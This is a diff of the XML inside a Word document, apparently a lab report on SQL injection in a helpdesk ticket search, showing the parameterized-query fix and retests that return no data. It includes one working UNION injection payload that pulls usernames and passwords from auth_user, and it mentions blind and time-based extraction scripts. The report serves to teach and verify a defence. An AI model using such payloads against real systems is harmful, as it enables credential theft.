+              <w:t>sql = (</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "SELECT id, title, submitter_email, status "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "FROM helpdesk_ticket "</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6784,21 +5966,8 @@
             <w:pPr>
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>cursor.execute</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, [f"%{term}%"])</w:t>
+            <w:r>
+              <w:t>cursor.execute(sql, [f"%{term}%"])</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6817,23 +5986,7 @@
         <w:t xml:space="preserve">Named change: </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">replaced string concatenation ('%" + term + "%') with a parameterized placeholder (%s, with the wildcarded value passed as a separate argument to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cursor.execute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">()), and removed the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mark_safe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>() call that had disabled output escaping on the same field.</w:t>
+        <w:t>replaced string concatenation ('%" + term + "%') with a parameterized placeholder (%s, with the wildcarded value passed as a separate argument to cursor.execute()), and removed the mark_safe() call that had disabled output escaping on the same field.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6876,31 +6029,7 @@
               <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">q=zzzz' UNION SELECT </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>NULL,username</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> || ':' || </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>password,NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>auth_user</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>--</w:t>
+              <w:t>q=zzzz' UNION SELECT NULL,username || ':' || password,NULL,NULL FROM auth_user--</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6935,6 +6064,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE428B5" wp14:editId="1C289495">
             <wp:extent cx="6858000" cy="3238500"/>
@@ -6991,22 +6123,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure </w:t>
-      </w:r>
-      <w:r>
-        <w:t>6</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>After – Objective 3 UNION payload against the patched code, now returning 0 matches instead of 4 staff credentials</w:t>
+        <w:t>Figure 6.3: After – Objective 3 UNION payload against the patched code, now returning 0 matches instead of 4 staff credentials</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7165,15 +6282,7 @@
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">blind_extract.py was rerun unmodified against the patched app. Every oracle query returned false, so the length binary search converged on </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>0</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> and no characters were recovered (Figure 6.4b).</w:t>
+              <w:t>blind_extract.py was rerun unmodified against the patched app. Every oracle query returned false, so the length binary search converged on 0 and no characters were recovered (Figure 6.4b).</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7205,15 +6314,7 @@
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">blind_extract_time.py was rerun unmodified against the patched app. No response was ever delayed, since </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pg_sleep</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>() never executes; the length search again converged on 0 (Figure 6.4c).</w:t>
+              <w:t>blind_extract_time.py was rerun unmodified against the patched app. No response was ever delayed, since pg_sleep() never executes; the length search again converged on 0 (Figure 6.4c).</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7225,13 +6326,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>Table 6.4</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Result after the fix vs </w:t>
+        <w:t xml:space="preserve">Table 6.4: Result after the fix vs </w:t>
       </w:r>
       <w:r>
         <w:t>Objective</w:t>
@@ -7239,6 +6334,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01FA82B9" wp14:editId="7C3B91B3">
             <wp:extent cx="6858000" cy="3009900"/>
@@ -7295,26 +6393,14 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure </w:t>
-      </w:r>
-      <w:r>
-        <w:t>6</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Tautology payload after the fix: 0 matches</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>Figure 6.4a: Tautology payload after the fix: 0 matches</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027593F4" wp14:editId="6EFE9A15">
             <wp:extent cx="6858000" cy="733425"/>
@@ -7371,26 +6457,14 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure </w:t>
-      </w:r>
-      <w:r>
-        <w:t>6</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>4b</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>blind_extract.py after the fix: password length 0, nothing recovered</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>Figure 6.4b: blind_extract.py after the fix: password length 0, nothing recovered</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73B9B994" wp14:editId="3307C681">
             <wp:extent cx="6858000" cy="695325"/>
@@ -7447,16 +6521,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure </w:t>
-      </w:r>
-      <w:r>
-        <w:t>6.4c</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>blind_extract_time.py after the fix: password length 0, nothing recovered</w:t>
+        <w:t>Figure 6.4c: blind_extract_time.py after the fix: password length 0, nothing recovered</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7469,35 +6534,11 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">All five objectives depended on a single unparameterized </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cursor.execute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">() call in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>advanced_ticket_search</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">(). Replacing string concatenation with a parameterized placeholder closed </w:t>
+        <w:t xml:space="preserve">All five objectives depended on a single unparameterized cursor.execute() call in advanced_ticket_search(). Replacing string concatenation with a parameterized placeholder closed </w:t>
       </w:r>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">every attack path used in this lab, error-based, UNION-based, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>boolean</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-blind, and time-blind alike, since they all relied on the same underlying ability to break out of the SQL string literal. Retesting each payload unmodified against the patched code confirmed none of them recovers any data, changes the result set, or produces a measurable timing difference.</w:t>
+        <w:t>every attack path used in this lab, error-based, UNION-based, boolean-blind, and time-blind alike, since they all relied on the same underlying ability to break out of the SQL string literal. Retesting each payload unmodified against the patched code confirmed none of them recovers any data, changes the result set, or produces a measurable timing difference.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8124,6 +7165,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -8701,8 +7743,10 @@
   </w:compat>
   <w:rsids>
     <w:rsidRoot w:val="0073142E"/>
+    <w:rsid w:val="00014167"/>
     <w:rsid w:val="0041151F"/>
     <w:rsid w:val="004423D8"/>
+    <w:rsid w:val="004C252B"/>
     <w:rsid w:val="006223A1"/>
     <w:rsid w:val="006318DD"/>
     <w:rsid w:val="0073142E"/>

</xml_diff>